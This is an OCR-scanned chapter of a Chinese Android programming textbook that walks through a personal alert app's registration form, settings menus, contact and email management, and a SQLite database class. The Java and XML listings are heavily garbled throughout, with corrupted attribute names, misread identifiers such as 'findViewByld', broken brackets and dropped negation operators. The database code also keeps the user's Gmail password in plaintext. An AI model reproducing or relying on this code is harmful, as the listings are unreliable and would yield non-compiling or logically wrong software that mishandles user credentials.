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在 系统 主 界面 中 ， 通 过 文本 框 和 按钮 控件 构建 了 一 个 系统 注册 表单 界面 。 
者 的 名 字 、 地 址 和 密码 等 信息 。 在 本 节 的 内 容 中 详细 讲解 本 系统 主 界面 的 具体 实现 流程 。 


22.3.1 实现 UI 布局 文件 


本 系统 主 界面 的 UI 文件 是 main.xml, 功能 是 通过 文本 框 控件 、 文本 控件 和 按钮 控件 构建 了 一 个 注册 框 ， 
具体 实现 代码 如 下 所 示 。 
<?xml version="1.0" encoding="utf-8"?> 
<ScrollView xmlns:android="http://schemas.android.com/apk/res/android" 
android:id="@+id/scroll" 
android:layout_width="fill_parent" 
android:layout_height="wrap_content"> 
<LinearLayout 
android:orientation="vertical" 
android:layout_width="fill_parent" 
android:layout_height="fill_ parent"> 
<TextView android:layout_width="wrap_content" 
android:layout height-"wrap content" 
android:text="@string/firstName"/> 
<EditText android:id="@+id/firstName" 
android:layout_width="fill_ parent" 
android:layout height-"wrap content"/» 
«TextView android:layout width-"wrap content" 
android:layout height-"wrap content" 
android:text="@string/secondName"/> 
<EditText android:id="@+id/secondName" 
android:layout width-"fill parent" 
android:layout_height="wrap_content"/> 
«TextView android:layout_width="Wrap_content" 
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android:layout height-"wrap content" 
android:text="@string/address" /> 
<EditText android:id="@+id/address" 
android:layout width-"fill parent" 
android:layout height-"wrap content" 
android:minLines="3" 
android:scrollbars="vertical" 
android:gravity="top"/> 
<TextView android:layout width="wrap content" 
android:layout_height="wrap_content" 
android:text="@string/security_pin" /> 
<EditText android:id="@+id/securityPin" 
android:layout widthz"fill parent" 
android:maxLength="4" 
android:password-"true" 
android:inputType="number" 
android:layout_height="wrap_content"/> 
<TextView android:layout_width="wrap_content" 
android:layout height-"wrap content" 
android:text-"(Qstring/re enter pin" /> 
«EditText android:id="@+id/securityPin2" 
android:layout widthz"fill parent" 
android:maxLength="4" 
android:password-"true" 
android:inputType-"number" 
android:layout_height="wrap_content"/> 
<Button 
android:id="@+id/save" 
android:maxLength="4" 
android:layout_height="wrap_content" 
android:layout_width="wrap_content" 
android:text="@string/save"/> 


</LinearLayout> 
</ScrollView> 


通过 上 述 代码 ， 构 建 了 一 个 传统 的 用 户 注册 登录 界面 。 执 行 效果 如 图 22-2 所 示 。 


图 22-2 登录 表单 界面 
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223.2 ”处 理 登 录 数 据 


编写 文件 SignUp.java， 功 能 是 获取 用 户 登录 表单 中 输入 的 用 户 名 、 密 码 和 地 址 等 信息 。 具 体 实 现代 码 
如 下 所 示 。 
public class SignUp extends Activity{ 
private Database database; 


public void onCreate(Bundle savedInstanceState) { 
super.onCreate(savedInstanceState); 
setContentView(R.layout.main); 
database = new Database(this); 
database.createTables(); 
checkDatabase(); 
onClick(); 

} 


private void checkDatabase(){ 
if(database.checkdetails(this) == true){ 
Intent loadPage = new Intent(this, LoadPage.class); 
startActivity(loadPage); 
SignUp.this.finish(); 
} 
else{ 
Toast.makeText(this, R.string.please enter your details for intial sign up, 3000).show(); 
) 
} 


private void onClick() { 
Button save = (Button) findViewByld(R.id.save); 
final Intent loadPage = new Intent(this, AnimationActivity.class); 
final EditText firstName = (EditText) findViewByld(R.id.firstName); 
final EditText secondName = (EditText) findViewByld(R.id.secondName); 
final EditText address = (EditText) findViewByld(R.id.address); 
final EditText pin1 = (EditText) findViewByld(R.id.securityPin); 
final EditText pin2 = (EditText) findViewByld(R.id.securityPin2); 
save.setOnClickListener(new View.OnClickListener() { 
public void onClick(View v) { 
if((firstName.getText().toString().trim().equals("") && IsecondName.getText().toString().trim().equals(™) 


&& laddress.getText().toString().trim().equals("")&&!pin2.getT ext().toString().equals("") 
&&lpin2.getText().toString().equals("))( 
if(pin1.getText().toString().equals(pin2.getText().toString()) ( 

if(pin1 .getText().length() == 4)( 
ContentValues values = new ContentValues(); 
values.put("ID", 1); 
values.put("firstName", firstName.getText().toString()); 
values.put('secondName", secondName.getText().toString()); 
values.put("address", address.getText().toString()); 
values.put("securityPin", pin1.getText().toString()); 
values.put("Location", "Default"); 
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database.savelnfo(values); 
database.addWordActivation("help"); 
startActivity(loadPage); 
SignUp.this.finish(); 
} 
else{ 
Toast.makeText(getApplicationContext(), R.string.pin must be 4 digits 
, 2000).show(); 
} 
} 
else( 
Toast. makeText(getApplicationContext(), R.string.security pin does not match, 2000).show(); 
} 
} 
else{ 
Toast.makeText(getApplicationContext(), R.string.must_enter_all_information, 2000).show(); 
} 
I 
b 


public void onDestroy() ( 
super.onDestroy(); 
b 


) 
通过 上 述 实现 代码 ， 将 用 户 的 登录 信息 保存 到 系统 数据 库 中 。 


22.4 系统 设置 界面 


Ши 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 22 章 \ 系 统 设置 界面 .avi 
通过 系统 设置 界面 ， 可 以 及 时 修改 系统 的 联系 人 信息 、 邮 箱 信息 和 密码 等 信息 。 在 本 节 的 内 容 中 ， 将 
详细 讲解 系统 设置 界面 的 具体 实现 流程 。 


22.4.1 设置 主 界面 


本 系统 设置 主 界面 的 UI 布局 文件 是 settings_menu.xml， 功 能 是 列表 显示 可 以 设置 的 功能 信息 ， 具 体 实 
现代 码 如 下 所 示 。 
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android" 
android:id="@+id/linearLayout" 
android:layout_width="match_parent" 
android:layout_height="match_parent" > 


<ImageView 
android:id="@+id/icon" 
android:layout_width="25px" 
android:layout_height="40px" 
android:layout_marginLeft="4px" 
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android:layout marginRight-"10px" 

android:layout marginTop-"4px" 

android:src="@drawable/password" > 
</ImageView> 


<TextView 
android:id="@+id/label" 
android:layout_width="fill_ parent" 
android:layout_height="fill_ parent" 
android:textSize="20px" 
android:text="@tid/label" > 
</TextView> 


</LinearLayout> 
执行 效果 如 图 22-3 所 示 。 


Contacts 


个 Email 


@ Word 


Person: 


图 22-3 系统 设置 界面 


系统 设置 主 界面 的 处 理 文件 是 SettingsArrayAdapter.java, 功能 是 根据 用 户 选择 设置 的 选项 来 显示 不 同 的 
提示 文本 。 假 如 用 户 选择 的 是 Change password 选项 ， 会 显示 对 应 的 文本 和 图 像 资源 。 文 件 
SettingsArrayAdapter.java 的 具体 实现 代码 如 下 所 示 。 

public class SettingsArrayAdapter extends ArrayAdapter<String> ( 

private final Context context; 
private final String[ ] values; 


public SettingsArrayAdapter(Context context, String[ ] values) ( 
super(context, R.layout.settings menu, values); 
this.context = context; 
this.values = values; 


) 


@Override 
public View getView(int position, View convertView, ViewGroup parent) ( 
Layoutlnflater inflater = (Layoutinflater) context 
.getSystemService(Context.LAYOUT INFLATER SERVICE); 
View rowView = inflater.inflate(R.layout.settings menu, parent, false); 
TextView textView = (TextView) rowView.findViewByld(R.id.label); 
ImageView imageView = (ImageView) rowView.findViewByld(R.id.icon); 
LinearLayout linearLayout = (LinearLayout) rowView.findViewByld(R.id.linearLayout); 
textView.setText(values[position]); 
String s = values[position]; 
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if (s.startsWith("Change password")) ( 
imageView.setlmageResource(R.drawable.password); 

} 

if (s.startsWith("Contacts")) { 
imageView.setlmageResource(R.drawable.contacts); 

} 

if (s.startsWith("Word activation")) { 
imageView.setlmageResource(R.drawable.speech); 

} 

if (s.startsWith("Email Contacts") { 
imageView.setlmageResource(R.drawable.email); 

E 

if (s.startsWith("Personal info")) { 
linearLayout.removeView(imageView); 
textView.setTextSize(20); 
textView.setBackgroundColor(OxffOOO00ff); 


} 

if (s.startsWith("Information")) { 
linearLayout.removeView(imageView); 
textView.setTextSize(20); 
textView.setBackgroundColor(0xff0000ff); 

T 


if (s.startsWith("Change details") { 
imageView.setlmageResource(R.drawable.details); 


} 

if (s.startsWith("Help")) { 
imageView.setlmageResource(R.drawable.help symbol); 

) 


return rowView; 
) 
} 
文件 Settings java 的 功能 是 在 设置 主 界面 中 加 载 显示 各 个 选项 的 设置 信息 ， 监 听 用 户 对 列表 中 某 一 先 
的 单 击 事件 ， 并 根据 用 户 的 单 击 执行 对 应 的 处 理 程序 以 来 到 对 应 的 二 级 界面 。 文 件 Settings java 的 具体 实现 
代码 如 下 所 示 。 
public class Settings extends ListActivity ( 
private String[ ] values; 
private String itemPressed; 
private ListView listView; 
private Context context; 
private int videoNum; 


@Override 
public void onCreate(Bundle savedinstanceState) { 
super.onCreate(savedinstanceState); 
this.context = this; 
if(getIntent() != null) { 
Bundle extras = getintent().getExtras(); 
videoNum = extras != null ? extras.getint("value") : 0; 
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} 
this.values = new String[ {getResources().getString(R.string.contacts), getResources().getString(R.string. 
email_contacts), 
getResources().getString(R.string.word_activation), getResources().getString(R.string.personal info), 
getResources().getString(R.string.change password), getResources().getString(R.string.change details), 
getResources().getString(R.string.information), getResources().getString(R.string.help)}; 


SettingsArrayAdapter adapter = new SettingsArrayAdapter(this, values); 
setListAdapter(adapter); 
} 


@Override 
protected void onListltemClick(ListView І, View v, int position, long id) { 

itemPressed = (String) getListAdapter().getltem(position); 

if(itemPressed.equals("Contacts"))( 
Intent contacts = new Intent(this, Contacts.class); 
startActivity (contacts); 

H 

else if(itemPressed.equals("Email Contacts")){ 
Database database = new Database(this); 
if(Idatabase.hasGmail())( 


createDialog(); 

} 

else{ 
Intent email = new Intent(this, EmailContacts.class); 
startActivity(email); 

} 


} 
else if(itemPressed.equals("Help")){ 
Intent loadPage = new Intent(getApplicationContext(), AnimationActivity.class); 


startActivity(loadPage); 

} 

else( 
Intent subMenuView = new Intent(this, SubMenuViews.class); 
subMenuView.putExtra("buttonPressed", itemPressed); 
startActivity(subMenuView); 

} 


} 


public boolean onKeyDown(int keyCode, KeyEvent event) { 
if (keyCode == KeyEvent.KEYCODE_BACK) { 
Intent i = new Intent(this, CameraView.class); 
this.finish(); 
i.putExtra("value", videoNum); 
startActivity(i); 
return true; 


} 


return super.onKeyDown(keyCode, event); 
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public void createDialog()( 
AlertDialog.Builder alert = new AlertDialog.Builder(this); 
TextView view 7 new TextView(this); 


view.setText(R.string.for you to be able to send emails you must supply your gmail and password 
for emergency send ); 
view.setTextSize(20); 
alert.setView(view); 
alert.setPositiveButton(R.string.ok, new DialogInterface.OnClickListener() ( 


public void onClick(DialogInterface dialog, int which) ( 
Intent emailForm = new Intent(getApplicationContext(), EmailForm.class); 
Settings.this.finish(); 
startActivity(emailForm); 
return; 
} 
» 


alert.setNegativeButton(R.string.cancel, new DialogInterface.OnClickListener() ( 


public void onClick(DialogInterface dialog, int which) ( 
return; 
} 

» 

alert.create(); 

alert.show(); 


) 
2242 ”系统 设置 二 级 界面 


单 击 系统 设置 界面 列表 中 的 某 一 个 选项 后 ， 回 到 二 级 设置 界面 ， 例 如 ， 选 择 Change password 选项 后 回 
”界面 ， 如 图 22-4 所 示 。 


Sa) @ s:25 AM 


到 “更 改 


图 22-4 “更 改 密码 ”界面 


由 此 可 见 ， 系 统 设 置 二 级 界面 的 UI 布局 文件 是 sub_menu_view.xml， 功 能 是 提供 了 一 个 信息 更 改 文 本 
框 和 按钮 表单 界面。 文件 sub_menu_view.xml 的 具体 实现 代码 如 下 所 示 。 
<LinearLayout 
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android:id="@+id/layout" 
xmlns:android="http://schemas.android.com/apk/res/android" 
android:orientation="vertical" 
android:layout width="match_parent” 
android:layout_height="match_parent"> 


<TextView android:id="@+id/view1" 
android:layout_width="wrap_content" 
android:layout_height="wrap_content"/> 

<EditText androi @+id/edit1" 
android:layout widthz"fill parent" 
android:layout_height="wrap_content"/> 


<TextView android:id="@+id/view2" 
android:layout_width="wrap_content" 
android:layout_height="wrap_content"/> 

<EditText android:id="@+id/edit2" 
android:layout widthz"fill parent" 
android:layout_height="wrap_content"/> 


<TextView android:id="@+id/view3" 
android:layout_width="wrap_content" 
android:layout_height="wrap_content"/> 
<EditText android:id="@+id/edit3" 
android:layout_width="fill_ parent" 
android:layout_height="wrap_content"/> 
<Button 
android:id="@+id/save" 
android:maxLength="4" 
android:layout height-"wrap content" 
android:layout width-"wrap content" 
android:text="@string/save_new"/> 


«TextView android:id="@+id/explanation" 
android:layout_width="wrap_content" 
android:vi ity-"gone" 
android:layout height-"wrap content" 
android:textSize="15px" 
android:textStyle-"italic" 
android:text-"(string/what is word activation and decibel system"/» 


<LinearLayout 

android:id="@+id/linearLayout2" 
android:visibility="gone" 
android:layout_width="match_parent" 
android:layout_height="wrap_content" > 


<ImageView 
android:id="@+id/icon2" 
android:layout_width="25px" 
android:layout height-"40px" 
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android:layout_marginLeft="4px" 
android:layout marginRight-"10px" > 
</ImageView> 


<TextView 
android:id="@+id/label2" 
android:layout widthz"fill parent" 
android:layout_height="fill_ parent" 
android:textSize="20px" > 
</TextView> 


</LinearLayout> 

<LinearLayout 

android:id="@+id/linearLayout3" 
android:visibility="gone" 
android:layout_width="match_parent" 
android:layout_height="45px" > 


«ImageView 
android:id="@+id/icon13" 
android:layout_width="25px" 
android:layout_height="40px" 
android:layout_marginLeft="4px" 
android:layout_marginRight="10px"> 
</ImageView> 


<TextView 
android:id="@+id/label1 3" 
android:layout_width="fill_parent" 
android:layout height-"wrap content" 
android:textSize="20px" 
android:text = "hello" > 

</TextView> 


</LinearLayout> 
文件 SubMenu Views. java 的 功能 是 ,监听 用 户 对 系统 设置 信息 的 修改 ,根据 用 户 在 表单 中 输入 的 修改 信 
息 更 新 系统 数据 库 。 文 件 SubMenuViews.java 的 具体 实现 代码 如 下 所 示 。 
public class SubMenuViews extends Activity í 
private Database database = new Database(this); 
private String itemPressed; 


public void onCreate(Bundle savedinstanceState) { 
super.onCreate(savedInstanceState); 
setContentView(R.layout.sub menu view); 


if(getIntent() != null) { 
Bundle extras = getintent().getExtras(); 
itemPressed = extras !- null ? extras.getString("buttonPressed"):""; 
sort(itemPressed); 
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} 


public void sort(String item)( 
InputFilter[ ] FilterArray = new InputFilter[1]; 
FilterArray[0] = new InputFilter.LengthFilter(4); 
final ViewGroup view = (ViewGroup) find ViewBylId(R.id.layout); 
final EditText edit1 = (EditText) findViewByld(R.id.edit1); 
final EditText edit2 = (EditText) findViewByld(R.id.edit2); 
final EditText edit3 = (EditText) findViewByld(R.id.edit3); 


final TextView view1 = (TextView) findViewByld(R.id.view1); 

final TextView view2 = (TextView) findViewByld(R.id.view2); 

final TextView view3 = (TextView) find ViewByld(R.id.view3); 

final TextView explanation = (TextView) findViewByld(R.id.explanation); 
final View view4 7 (View) findViewByld(R.id.linearLayout2); 

final View view5 7 (View) findViewByld(R.id.linearLayout3); 

final Button save = (Button) findViewByld(R.id.save); 


if(item.equals("Change details"))( 
view1.setText(R.string.first name); 
view2.setText(R.string.second name); 
view3.setText(R.string.address); 
edit3.setMinLines(3); 
String[ ] values = database.getPersonalDetails(); 
edit1.setText(values[0]); 
edit2.setText(values[1]); 
edit3.setText(values[2]); 

) 


if(item.equals("Email Contacts")){ 
view1.setText(R.string.mailer name); 
edit2.setInputType(InputType. TYPE TEXT VARIATION EMAIL ADDRESS); 
view2.setText(R.string.email address); 
view.removeView(edit3); 
) 
if(item.equals("Change password")){ 
edit1.setFilters(FilterArray); 
edit2.setFilters(FilterArray); 
edit3.setFilters(FilterArray); 


edit1.setRawInputType(InputType. TYPE CLASS NUMBER); 
edit2.setRawInputType(InputType. TYPE CLASS NUMBER); 
edit3.setRawInputType(InputType. TYPE CLASS NUMBER); 
view1.setText(R.string.enter old pin); 
view2.setText(R.string.enter new pin); 
view3.setText(R.string.re enter new pin); 

} 

if(item.equals("Add new contact")){ 
view1.setText(R.string.first name); 
view2.setText(R.string.second name); 
view3.setText(R.string.number); 
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edit3.setRawlnputType(InputType.TYPE CLASS NUMBER); 
} 


if(item.equals("Word activation") 
view1.setText(R.string.please_enter the word you want to use to activate the alert); 
view1.setTextSize(20); 
edit1.setText(database.getActivationWord()); 
explanation.setVisibility(View. VISIBLE); 
explanation.setTextColor(OxffOOO0ff); 
final TextView label = (TextView) findViewByld(R.id.label2); 
final ImageView img = (ImageView) findViewByld(R.id.icon2); 
final TextView label2 = (TextView) findViewByld(R.id.label13); 
final ImageView img2 = (ImageView) find ViewBylId(R.id.icon 13); 
view4.setVisibility(View. VISIBLE); 
String val = database.getActivationState(); 


if(val.equals("ON")){ 
img.setlmageResource(R.drawable.on); 
label.setText(R.string.word activation on); 


} 
else{ 
img.setImageResource(R.drawable.off); 
label.setText(R.string.word_activation_off); 
} 


view4.setClickable(true); 
view4.setOnClickListener(new View.OnClickListener(){ 


public void onClick(View v) { 
if(database.getActivationState().equals("OFF")){ 
label.setText(R.string.word activation on); 
database.setActivationWordState("ON"); 
img.setlmageResource(R.drawable.on); 


} 
else{ 
label.setText(R.string.word_activation_off); 
database.setActivationWordState("OFF"); 
img.setImageResource(R.drawable.off); 
label2.setText(R.string.decibel_system_off); 
database.setDecibelState("OFF"); 
img2.setImageResource(R.drawable. off); 
} 
} 
» 
view5.setVisibility (View. VISIBLE); 
String val2 = database.getDecibelState(); 
if(val2.equals("ON") { 
img2.setlmageResource(R.drawable.on); 
label2.setText(R.string.decibel system on); 
} 
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else{ 
img2.setlmageResource(R.drawable.off); 
label2.setText(R.string.decibel system off); 
} 
view5.setClickable(true); 
view5.setOnClickListener(new View.OnClickListener(){ 


public void onClick(View v) { 
if(database.getDecibelState().equals("OFF"))( 
if(database.getActivationState().equals("ON"))( 
label2.setText(R.string.decibel system on); 
database.setDecibelState("ON"); 
img2.setlmageResource(R.drawable.on); 


} 
else{ 
ToastmakeText(getBaseContext(), R.string.you must enable word activation - 
first, 2000).show(); 

} 

} 

else{ 
label2.setText(R.string.decibel_system_off); 
database.setDecibelState("OFF"); 
img2.setlmageResource(R.drawable.off); 

) 


}; 
explanation.setOnClickListener(new View.OnClickListener() { 


public void onClick(View argO) { 
openDialog(); 
} 
» 
view.removeView(edit2); 
view.removeView(edit3); 
) 
save.setOnClickListener(new OnClickListener(){ 


public void onClick(View v) { 
if(itemPressed.equals("Word activation") { 
String word = edit1.getText().toString(); 
if(tword.equals("") { 
database.updateWordActivation(word); 
} 


else( 
Toast.makeText(getApplicationContext(), R.string.field is empty, 2000).show(); 
} 


} 
if(itemPressed.equals("Email Contacts"))( 


String name = edit1.getText().toString(); 
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String address - edit2.getText().toString(); 
if(Iname.equals("")&&!address.equals("")){ 
database.saveEmailContact(name, address); 
Intent email = new Intent(getApplicationContext(), EmailContacts.class); 
SubMenuViews.this.finish(); 
startActivity(email); 
} 
else{ 
Toast.makeText(getApplicationContext(), R.string.field is empty, 2000).show(); 
} 
} 
if(itemPressed.equals("Change details")){ 
String firstName = edit1.getText().toString(); 
String secondName = edit2.getText().toString(); 
String address = edit3.getText().toString(); 
if(firstName.trim().equals("")&&!secondName.trim().equals("")&&!address.trim().equals("") { 
ContentValues args = new ContentValues(); 
args.put("firstName", firstName); 
args.put("secondName", secondName); 
args.put("address", address); 
database.updateTableUser(args); 
Intent i = new Intent(getApplicationContext(), Settings.class); 
SubMenuViews.this.finish(); 
startActivity(i); 
} 
else{ 
Toast.makeText(getApplicationContext(), R.string.one of the fields are empty, 
2000).show(); 
) 
} 
if(itemPressed.equals("Add new contact")){ 
String firstName = edit1.getText().toString(); 
String secondName = edit2.getText().toString(); 
firstName = firstName +" "+ secondName; 
String number = edit3.getText().toString(); 
if(!number.trim().equals("")&&!firstName.trim().equals("")){ 
ContentValues args = new ContentValues(); 
args.put("name", firstName); 
args.put("number", number); 
database.updateTableContacts(args); 
Intent i = new Intent(getApplicationContext(), Contacts.class); 
SubMenuviews.this.finish(); 
startActivity(i); 
} 
else( 
Toast.makeText(getApplicationContext(), R.string.one of the fields are empty, 
2000).show(); 


) 


if(itemPressed.equals("Change password"))( 
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String oldValue = edit1.getText().toString(); 
String newValue = edit2.getText().toString(); 
String newValue2 = edit3.getText().toString(); 
if(newValue.equals(newValue2))( 
boolean match = database.checkPin(oldValue, getApplicationContext()); 
if(match == true)( 
ContentValues args = new ContentValues(); 
args.put("securityPin", newValue); 
database.updateTableUser(args); 
Intent i = new Intent(getApplicationContext(), Settings.class); 


SubMenuviews.this.finish(); 
startActivity(i); 
} 
else( 
Toast.makeText(getApplicationContext(), R.string.old pin does not match, 
2000).show(); 
} 
} 
else{ 
Toast.makeText(getApplicationContext(), R.string.re_enter_value_does_not_match, 
2000).show(); 
} 
} 
} 
» 
} 


public void openDialog()( 
AlertDialog.Builder alert = new AlertDialog.Builder(this ); 
final TextView input = new TextView(this); 
input.setText(R.string.explanation); 
input.setTextSize(20); 
alert.setView(input); 
alert.setPositiveButton(R.string.ok, new DialogInterface.OnClickListener() { 


public void onClick(DialogInterface dialog, int which) ( 
return; 
) 
» 
alert.create(); 
alert.show(); 


H 
22.4.3 ”添加 联系 人 


单 击 主 界面 中 的 Contacts 按钮 后 来 到 添加 联系 人 界面 ， 如 图 22-5 所 示 。 


UU Android f 9? 4 F di Sc t 


DME 5:54 AM 


+ Add new contact 


图 22-5 添加 联系 人 界面 
添加 联系 人 界面 的 UI 布局 文件 是 contacts.xml， 具 体 实 现代 码 如 下 所 示 。 


<?xml version="1.0" encoding="utf-8"?> 
<LinearLayout xmlns:android-"http://schemas.android.com/apk/res/android" 
android:id="@+id/linearLayout" 
android:layout_width="match_parent" 
android:layout_height="match_parent" > 


«ImageView 
android:id="@+id/icon" 
android:layout_width="25px" 
android:layout_height="50px" 
android:layout_marginLeft="4px" 
android:layout_marginRight="10px" 
android:layout_marginTop="4px" 
android:src="@drawable/person" > 

</ImageView> 


<TextView 
android:id="@+id/label" 
android:layout_width="fill_ parent" 
android:layout_height="fill_ parent" 
android:textSize="20px" 
android:text="@+id/label" > 
</TextView> 


</LinearLayout> 
文件 Contacts. java 的 功能 是 监听 用 户 的 操作 事件 ,可 以 分 别 实现 添加 联系 人 、 修 改 联 系 人 和 删除 联系 人 
功能 ， 具 体 实现 代码 如 下 所 示 。 
public class Contacts extends ListActivity { 
private String[ ] values; 
private String itemPressed; 
private ListView listView; 
private Context context; 


@Override 

public void onCreate(Bundle savedInstanceState) { 
super.onCreate(savedInstanceState); 
this.context = this; 
Database db = new Database(this); 
Cursor cursor = db.getContacts(context); 
inti = 0; 
if(cursor.getCount()>0){ 
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this.values = new String[cursor.getCount()+1]; 
while(cursor.moveToNext())( 
values [i] 7 cursor.getString(cursor.getColumnIndex("name")); 


i++; 
} 
values[i++] = getString(R.string.add_new_contact); 
jelsef 


Toast.makeText(this, R.string.empty, 500).show(); 
String val = getResources().getString(R.string.add new contact); 
this.values = new String[ {val}; 
} 
ContactsArrayAdaptor adapter = new ContactsArrayAdaptor(this, values); 
setListAdapter(adapter); 
) 


@Override 
protected void onListltemClick(ListView І, View v, int position, long id) { 

itemPressed = (String) getListAdapter().getltem(position); 

if(itemPressed.equals("Add new contact"))( 
Intent subMenuView = new Intent(this, SubMenuViews.class); 
subMenuView.putExtra("buttonPressed", itemPressed); 
Contacts.this.finish(); 
startActivity(subMenuView); 

b 

else( 
AlertDialog.Builder alert = new AlertDialog.Builder(this); 


TextView view 7 new TextView(this); 
view.setText("Do you want to delete "+itemPressed+" from contacts?"); 
view.setTextSize(25); 
alert.setView(view); 
alert.setPositiveButton(R.string.delete, new DialogInterface.OnClickListener() ( 
public void onClick(DialogInterface dialog, int which) ( 
Database db = new Database(context); 
db.deleteContact(itemPressed); 
Intent contacts = new Intent(context, Contacts.class); 
Contacts.this.finish(); 
startActivity(contacts); 
return; 
} 
» 


alert.setNegativeButton(R.string.cancel, new Dialoglnterface.OnClickListener() { 
public void onClick(DialogInterface dialog, int which) ( 


return; 
} 
» 
alert.create(); 
alert.show(); 
} 
} 
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22.4.4 邮箱 设置 


单 击 系统 主 界面 中 的 Email Contact 按钮 后 来 到 邮箱 设置 界面 ， 如 图 22-6 所 示 。 


图 22-6 邮箱 设置 界面 


文件 EmailContacts.java 的 功能 是 ， 根 据 用 户 在 表单 中 设置 或 输入 的 数据 实现 邮箱 添加 和 删除 功能 ， 具 
体 实现 代码 如 下 所 示 。 
public class EmailContacts extends ListActivity { 
private String[ ] values; 
private String itemPressed; 
private ListView listView; 
private Context context; 


@Override 
public void onCreate(Bundle savedinstanceState) { 
super.onCreate(savedInstanceState); 
this.context = this; 
Database db = new Database(this); 
Cursor cursor = db.getEmailContacts(); 
inti = 0; 
if(cursor.getCount()>0){ 
this.values = new String[cursor.getCount()+1]; 
while(cursor.move ToNext()){ 
values [i] = cursor.getString(cursor.getColumnIndex("name")); 
i++; 


} 
values[i++] = getString(R.string.add new email contact); 


Jelset 
Toast.makeText(this, "empty", 500).show(); 
String val = getResources().getString(R.string.add new email contact); 
this.values = new String[ (val); 


H 
EmailArrayAdaptor adapter = new EmailArrayAdaptor(this, values); 
setListAdapter(adapter); 
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@Override 
protected void onListltemClick(ListView 1, View v, int position, long id) ( 
itemPressed = (String) getListAdapter().getltem(position); 
if(itemPressed.equals("Add new email contact"))( 

Intent subMenuView = new Intent(this, SubMenuViews.class); 

subMenuView.putExtra("buttonPressed", "Email Contacts"); 

EmailContacts.this.finish(); 

startActivity(subMenuView); 

} 
else{ 

AlertDialog.Builder alert = new AlertDialog.Builder(this); 
alert.setTitle(R.string.do you want to delete *itemPressed-*R.string. from contacts); 
alert.setPositiveButton(R.string.delete, new DialogInterface.OnClickListener() ( 

public void onClick(DialogInterface dialog, int which) ( 

Database db = new Database(context); 
db.deleteEmailContact(itemPressed); 
Intent contacts 7 new Intent(context, EmailContacts.class); 
EmailContacts.this.finish(); 
startActivity(contacts); 
return; 
} 
» 


alert.setNegativeButton(R.string.cancel, new Dialoginterface.OnClickListener() { 
public void onClick(DialogInterface dialog, int which) ( 


return; 
H 
» 
alert.create(); 
alert.show(); 
i 
} 


public boolean onKeyDown(int keyCode, KeyEvent event) { 
if (keyCode == KeyEvent.KEYCODE_BACK) { 
Intent settings = new Intent(context, Settings.class); 
EmailContacts.this.finish(); 
startActivity (settings); 
return true; 


} 


return super.onKeyDown(keyCode, event); 
} 
22.4.5 ”系统 数据 操作 
因为 在 本 系统 中 涉及 了 很 多 和 数据 有 关 的 操作 ， 例 如 用 户 名 、 密 码 、 邮 箱 、 联 系 人 和 短信 等 信息 ， 为 


了 便于 维护 上 述 数据 信息 ， 本 系统 使 用 SQLite 数据 库 对 数据 进行 了 存储 。 在 文件 Database java 中 构建 了 
个 SQLite 数 据 库 操作 模式 ,分 别 定义 了 数据 更 新 数据 添加 和 数据 删除 等 功能 的 SQL 语句。 文件 Databasejava 


O 
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的 具体 实现 代码 如 下 所 示 。 
public class Database extends SQLiteOpenHelper { 


private static final Sting DATABASE PATH = "/data/data/com.attack.android/databases/"; 

private static final Sting DATABASE NAME = "AttackAppDatabase"; 

private String createTable = "CREATE TABLE user(ID INTEGER, firstName TEXT, secondName TEXT," + 
" address TEXT, securityPin TEXT, location TEXT, emailAddress TEXT, password TEXT);"; 

private String createTableContacts = "CREATE TABLE contacts(ID INTEGER, name TEXT," + 

" number TEXT);"; 

private String createTableAudio = "CREATE TABLE audio(ID INTEGER, wordActivation ТЕХТ," + 
"wordActivationOn TEXT, decibelOn ТЕХТ);"; 

private String createTableEmail = "CREATE TABLE emailContacts(ID INTEGER, name TEXT, emailAddress 


TEXT)"; 


e. 


private String myPath - DATABASE PATH * DATABASE NAME; 


private Context myContext; 
private SQLiteDatabase myDatabase; 


public Database(Context context) ( 
super(context, DATABASE NAME, null, 1); 
this.myContext = context; 
} 


public void savelnfo(ContentValues values) 
myDatabase = getWritableDatabase(); 
myDatabase = SQLiteDatabase.openDatabase(myPath, null, SQLiteDatabase.CREATE_IF_NECESSARY); 
myDatabase.insert("user" , "" , values); 
myDatabase.close(); 


} 


public void saveGmail(String address, String password)( 
myDatabase = SQL iteDatabase.openDatabase(myPath, null, SQLiteDatabase.CREATE IF NECESSARY); 
ContentValues args = new ContentValues(); 
args.put("emailAddress", address); 
args.put("password", password); 
myDatabase.update("user", args, "ID ="+1, null); 
args.clear(); 
myDatabase.close(); 
} 


public boolean hasGmail(){ 
myDatabase = SQLiteDatabase.openDatabase(myPath, null, SQLiteDatabase.CREATE IF NECESSARY); 
boolean found - false; 
Cursor cursor = myDatabase.rawQuery("SELECT emailAddress FROM user;", null); 


if(cursor.getCount()>0){ 
cursor.moveToFirst(); 
String val = cursor.getString(cursor.getColumnIndex("emailAddress")); 
if(val != null 
found = true; 
} 
} 
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cursor.close(); 
myDatabase.close(); 
return found; 


} 


public void saveEmailContact(String name, String address){ 
myDatabase = SQLiteDatabase.openDatabase(myPath, null, SQLiteDatabase.CREATE_IF_NECESSARY); 
ContentValues args = new ContentValues(); 
args.put("name", name); 
args.put("emailAddress", address); 
myDatabase.insert("emailContacts","", args); 
args.clear(); 
myDatabase.close(); 


} 


public String[ ] getGmail()( 
myDatabase = SQLiteDatabase.openDatabase(myPath, null, SQLiteDatabase.CREATE_IF_NECESSARY); 
String[] args1 = new String[2]; 
Cursor args = myDatabase.rawQuery(" SELECT * FROM user;", null); 


args.moveToFirst(); 

args1[0] = args.getString(args.getColumnIndex("emailAddress")); 
args1[1] = args.getString(args.getColumnIndex("password")); 
myDatabase.close(); 

args.close(); 

return args1; 


} 


public Cursor getEmailContacts(){ 
myDatabase = SQLiteDatabase.openDatabase(myPath, null, SQLiteDatabase.CREATE IF NECESSARY); 
Cursor args = myDatabase.rawQuery("SELECT * FROM emailContacts;", null); 
args.getCount(); 
myDatabase.close(); 
return args; 


} 


public void deleteEmailContact(String value){ 
myDatabase = SQLiteDatabase.openDatabase(myPath, null, SQLiteDatabase.CREATE IF NECESSARY); 
myDatabase.delete("emailContacts", "пате=?", new String[ ](value)); 
myDatabase.close(); 


} 
public boolean checkDataBase()( 


SQLiteDatabase checkDB = null; 


try( 
String myPath = DATABASE_PATH + DATABASE_NAME; 
IIThis causes the collator LOCALIZED not to be created. You must be consistent 
/when using this flag to use the setting the database was created with 
checkDB = SQLiteDatabase.openDatabase(myPath, null, SQLiteDatabase.CREATE IF NECESSARY); 
